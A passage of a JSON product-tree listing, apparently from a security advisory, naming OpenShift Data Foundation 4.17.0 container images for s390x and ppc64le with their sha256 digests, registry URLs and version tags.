"purl": "pkg:oci/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.17.0-7"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"product_id": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"product": {
"name": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"product_id": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"product_id": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"product_id": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"product_id": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.17.0-51"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"product_id": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.17.0-46"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"product": {
"name": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"product_id": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"product_id": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"product_id": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"product_id": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"product_id": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"product_id": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.17.0-66"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"product_id": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"product_id": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"product_id": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"product": {
"name": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"product_id": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.17.0-7"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"product_identification_helper": {
